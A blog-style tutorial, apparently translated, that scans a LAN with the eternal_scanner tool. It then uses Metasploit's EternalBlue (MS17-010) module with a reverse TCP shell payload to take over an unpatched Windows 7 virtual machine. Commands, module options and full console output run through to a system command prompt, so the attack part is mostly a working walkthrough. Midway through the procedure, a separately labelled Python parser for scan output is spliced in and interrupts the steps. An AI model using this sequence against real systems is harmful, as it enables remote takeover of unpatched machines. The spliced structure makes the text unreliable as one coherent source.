Overview
It has been a while since I wrote about a tool. Today's post introduces an EternalBlue vulnerability scanner that can scan a single host or an entire IP range.
Enough talk; let's install it and try it out.
Usage
First start the Kali VM. Ideally also prepare a freshly installed Windows 7 VM; on Windows 7, enable network discovery and file sharing, which means opening port 445.
Then download the tool:
git clone https://github.com/peterpt/eternal_scanner.git
Install the required dependencies:
apt install masscan metasploit-framework wget
Set the scan rate to its maximum, scan the whole LAN, and run it:
root@kali:~/kali_tools/eternal_scanner# ./escan -s 10000000
*****************************************
* ▄▄▄ .▄▄▄▄▄▄▄▄ .▄▄▄ ▐ ▄ ▄▄▄· ▄▄▌ *
* ▀▄.▀·•██ ▀▄.▀·▀▄ █·•█▌▐█▐█ ▀█ ██• *
* ▐▀▀▪▄ ▐█.▪▐▀▀▪▄▐▀▀▄ ▐█▐▐▌▄█▀▀█ ██▪ *
* ▐█▄▄▌ ▐█▌·▐█▄▄▌▐█•█▌██▐█▌▐█ ▪▐▌▐█▌▐▌ *
* ▀▀▀ ▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪ ▀ ▀ .▀▀▀ *
* .▄▄ · ▄▄· ▄▄▄· ▐ ▄ ▐ ▄ ▄▄▄ .▄▄▄ *
* ▐█ ▀. ▐█ ▌▪▐█ ▀█ •█▌▐█•█▌▐█▀▄.▀·▀▄ █· *
* ▄▀▀▀█▄██ ▄▄▄█▀▀█ ▐█▐▐▌▐█▐▐▌▐▀▀▪▄▐▀▀▄ *
* ▐█▄▪▐█▐███▌▐█ ▪▐▌██▐█▌██▐█▌▐█▄▄▌▐█•█▌ *
* ▀▀▀▀ ·▀▀▀ ▀ ▀ ▀▀ █▪▀▀ █▪ ▀▀▀ .▀ ▀ *
*****************************************
* Current Version : 2.1 *
*****************************************
For switches write (escan -h)
Config Port: 445 | Rate Speed: 10000000 pkt/s
Enter IP or IP range .
Example 1 : 192.168.1.32
Example 2 : 192.168.1.1/24
IP/IP Range : 192.168.1.1/24
User IP Input : 192.168.1.1/24
Press CTRL-C (1X ONLY) to stop the scanner
Scanner started at 04:18:50 , Please Wait
Scanner stopped/finished at 04:19:08
It was not detected in 192.168.1.1/24 any port 445 opened.
A complete EternalBlue compromise of Windows 7
Next I start the Windows VM I installed and attack it. To be clear up front: this machine is a fresh install with no patches applied, and network discovery and file sharing are enabled.
At first all I know is that the machine is on my LAN; I do not know its IP address.
Scan with the tool:
root@kali:~/kali_tools/eternal_scanner# ./escan -s 10000000
For switches write (escan -h)
Config Port: 445 | Rate Speed: 10000000 pkt/s
Enter IP or IP range .
Example 1 : 192.168.1.32
Example 2 : 192.168.1.1/24
IP/IP Range : 192.168.1.1/24
User IP Input : 192.168.1.1/24
Press CTRL-C (1X ONLY) to stop the scanner
Scanner started at 04:25:15 , Please Wait
Scanner stopped/finished at 04:25:35
Checking ips :
----------------------------
192.168.1.107
----------------------------
Collected 1 ips
Checking if the 1 ips above are vulnerable
Press CTRL-C (1X ONLY) to stop ips vulnerability check
(aborting this process will not verify all ips)
Please Wait , checking 1 ips may take a while
+---------------------------------------------------+
| Realtime Eternal Scan Metasploit results Checkout |
+---------------------------------------------------+
| Please wait for percentage output |
+---------------------------------------------------+
[*] Scanned 1 of 1 hosts (100% complete)
1 Vulnerable ips found
---------------------------------------
192.168.1.107
---------------------------------------
Eternal Scanner saved the vulnerable ips to /usr/local/share/Eternal_Scanner/vuln.txt
As you can see, the scan found one IP, 192.168.1.107,
and saved the result to /usr/local/share/Eternal_Scanner/vuln.txt.
Next, we start the attack.
First open Metasploit
and search for an exploit module; if there is none, update your Metasploit.
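As an added example (not part of the original post or of the eternal_scanner project), here is a small Python parser for the escan output format shown above, so that scan results can be fed into patch tracking instead of being read by eye. The two sample texts are constructed from the result sections of the two runs above (banner omitted); the count consistency checks and the unflagged_open_hosts helper are my own additions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample 1: result section of the second run above (one host found).
ESCAN_HIT = """\
Config Port: 445 | Rate Speed: 10000000 pkt/s
User IP Input : 192.168.1.1/24
Scanner started at 04:25:15 , Please Wait
Scanner stopped/finished at 04:25:35
Checking ips :
----------------------------
192.168.1.107
----------------------------
Collected 1 ips
Checking if the 1 ips above are vulnerable
[*] Scanned 1 of 1 hosts (100% complete)
1 Vulnerable ips found
---------------------------------------
192.168.1.107
---------------------------------------
Eternal Scanner saved the vulnerable ips to /usr/local/share/Eternal_Scanner/vuln.txt
"""

# Constructed sample 2: the first run above, where nothing answered on 445.
ESCAN_MISS = """\
Config Port: 445 | Rate Speed: 10000000 pkt/s
User IP Input : 192.168.1.1/24
Scanner started at 04:18:50 , Please Wait
Scanner stopped/finished at 04:19:08
It was not detected in 192.168.1.1/24 any port 445 opened.
"""


@dataclass
class EscanReport:
    port: Optional[int] = None
    rate_pps: Optional[int] = None
    target: Optional[str] = None
    open_hosts: List[str] = field(default_factory=list)        # answered on the scanned port
    vulnerable_hosts: List[str] = field(default_factory=list)  # flagged by the MS17-010 check
    save_path: Optional[str] = None


IPV4_LINE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_escan_output(text: str) -> EscanReport:
    """Parse one escan run. Raises ValueError when a host list does not match
    the count escan printed for it (for example output cut short by CTRL-C)."""
    report = EscanReport()
    section = None        # host list we are currently inside: None, "open" or "vuln"
    expected_vuln = None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Config Port:\s*(\d+)\s*\|\s*Rate Speed:\s*(\d+)", line)
        if m:
            report.port, report.rate_pps = int(m.group(1)), int(m.group(2))
            continue
        m = re.match(r"User IP Input\s*:\s*(\S+)", line)
        if m:
            report.target = m.group(1)
            continue
        if line.startswith("Checking ips"):
            section = "open"
            continue
        m = re.match(r"Collected (\d+) ips", line)
        if m:
            if int(m.group(1)) != len(report.open_hosts):
                raise ValueError("open-host count does not match the listed hosts")
            section = None
            continue
        m = re.match(r"(\d+) Vulnerable ips found", line)
        if m:
            expected_vuln = int(m.group(1))
            section = "vuln"
            continue
        m = re.match(r"Eternal Scanner saved the vulnerable ips to (\S+)", line)
        if m:
            report.save_path = m.group(1)
            if expected_vuln is not None and expected_vuln != len(report.vulnerable_hosts):
                raise ValueError("vulnerable-host count does not match the listed hosts")
            section = None
            continue
        if section is not None and IPV4_LINE.match(line):
            target_list = report.open_hosts if section == "open" else report.vulnerable_hosts
            target_list.append(line)
    return report


def unflagged_open_hosts(report: EscanReport) -> List[str]:
    """Hosts that answered on 445 but were not flagged. Worth confirming their
    patch level by hand: escan itself warns that an aborted check does not
    verify every host."""
    return [h for h in report.open_hosts if h not in report.vulnerable_hosts]


if __name__ == "__main__":
    r = parse_escan_output(ESCAN_HIT)
    print(f"{r.target}: {len(r.open_hosts)} open, {len(r.vulnerable_hosts)} vulnerable -> {r.vulnerable_hosts}")
```

Feeding the parser the captured stdout of a real run (or the same text read from a log) gives a structured record of which hosts on the range still need MS17-010 applied; the vulnerable list should match the contents of the vuln.txt path that escan reports.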
root@kali:~/kali_tools/eternal_scanner# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v4.16.7-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 299 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search CVE-2017-0144
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name                                      Disclosure Date  Rank     Description
----                                      ---------------  ----     -----------
auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
msf >
Right, there are two usable modules: the first is a scanner module and the second is the exploit module. So it is simple; follow the steps below.
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name                Current Setting  Required  Description
----                ---------------  --------  -----------
GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
GroomDelta          5                yes       The amount to increase the groom count by per try.
MaxExploitAttempts  3                yes       The number of times to retry the exploit.
ProcessName         spoolsv.exe      yes       Process to inject payload into.
RHOST               192.168.1.107    yes       The target address
RPORT               445              yes       The target port (TCP)
SMBDomain           .                no        (Optional) The Windows domain to use for authentication
SMBPass                              no        (Optional) The password for the specified username
SMBUser                              no        (Optional) The username to authenticate as
VerifyArch          true             yes       Check if remote architecture matches exploit Target.
VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Payload options (generic/shell_reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.1.104    yes       The listen address
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.1.107:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.104:4444 -> 192.168.1.107:49161) at 2017-10-18 04:35:41 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>
Success.
Feel free to follow my blog at www.bboy.app
Have Fun